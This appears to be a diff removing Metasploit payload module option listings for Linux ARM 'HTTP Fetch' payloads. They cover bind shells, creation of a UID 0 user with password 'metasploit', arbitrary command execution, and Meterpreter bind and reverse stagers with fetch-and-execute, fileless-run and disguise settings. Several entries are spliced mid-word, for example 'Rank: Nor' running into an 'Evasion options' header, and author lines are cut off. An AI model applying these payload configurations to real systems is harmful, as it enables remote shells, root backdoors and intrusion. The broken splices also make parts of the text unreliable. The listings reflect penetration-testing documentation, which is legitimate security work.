SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,72 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline
|
||||
Module: payload/cmd/linux/http/armbe/shell_bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 0
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD /bin/sh yes The command to execute.
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMBE payload from an HTTP server.
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,70 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Add User
|
||||
Module: payload/cmd/linux/http/armle/adduser
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: Yes
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Jonathan Salwan
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
PASS metasploit yes The password for this user
|
||||
SHELL /bin/sh no The shell for this user
|
||||
USER metasploit yes The username to create
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Create a new user with UID 0
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,68 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Execute Command
|
||||
Module: payload/cmd/linux/http/armle/exec
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Jonathan Salwan
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD yes The command string to execute
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Execute an arbitrary command
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,96 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Bind TCP Stager
|
||||
Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
nemo <nemo@felinemenace.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Listen for a connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,102 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Nor
|
||||
Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp:
|
||||
=========================
|
||||
|
||||
nemo <nemo@felinemenace.org>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/armle/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
ok@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an ARMLE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
